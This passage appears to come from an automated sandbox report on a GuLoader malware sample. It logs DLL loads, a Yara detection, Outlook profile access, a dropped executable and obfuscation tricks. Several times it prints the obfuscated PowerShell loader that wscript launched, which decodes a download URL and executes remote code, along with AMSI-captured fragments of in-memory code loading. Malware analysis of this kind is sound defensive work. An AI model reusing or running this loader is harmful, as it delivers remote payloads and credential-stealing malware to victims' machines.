Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dxdiag.pdbGCTL source: 31437F.exe.18.dr
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dxdiag.pdb source: 31437F.exe.18.dr
Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D11000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: on.pdb source: powershell.exe, 00000004.00000002.3032733282.0000000007606000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: dxdiag.exe PID: 2072, type: MEMORYSTR
Source: Yara match File source: 00000004.00000002.3038911552.000000000B1AF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3038628107.0000000008960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3026899970.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Buriers)$global:Meatball189 = [System.Text.Encoding]::ASCII.GetString($Unitarismes)$global:Yasmak=$Meatball189.substring($Frastdtes,$Tracheloclavicular)<#Curtseyed Kuans Unbesot Plud
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Reeker $Hnd109 $Udlignende102), (Delayer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Chitlin = [AppDomain]::CurrentDomain.GetAssemblies()$global:Eksame
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Horrah)), $Outpoise).DefineDynamicModule($Countably, $false).DefineType($Carle, $Undramatical, [System.MulticastDelegate])$Duehgenes.D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Buriers)$global:Meatball189 = [System.Text.Encoding]::ASCII.GetString($Unitarismes)$global:Yasmak=$Meatball189.substring($Frastdtes,$Tracheloclavicular)<#Curtseyed Kuans Unbesot Plud
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru Jump to behavior
Binary contains a suspicious time stamp
Source: 31437F.exe.18.dr Static PE information: 0xA39C6329 [Mon Dec 25 02:00:09 2056 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848CE51D3 pushad ; iretd 2_2_00007FF848CE52B9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848CE00BD pushad ; iretd 2_2_00007FF848CE00C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_049D370F push eax; iretd 4_2_049D3749
Source: C:\Windows\SysWOW64\dxdiag.exe Code function: 18_3_05F69F7F push ebp; retf 000Ah 18_3_05F69F84
Source: C:\Windows\SysWOW64\dxdiag.exe Code function: 18_3_05F68DE7 push ds; retf 18_3_05F68DE8
Source: C:\Windows\SysWOW64\dxdiag.exe Code function: 18_3_05F695C7 push cs; iretd 18_3_05F695C8
Source: C:\Windows\SysWOW64\dxdiag.exe Code function: 18_3_05F6B048 push eax; ret 18_3_05F6B049
Drops PE files
Source: C:\Windows\SysWOW64\dxdiag.exe File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe Jump to dropped file
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
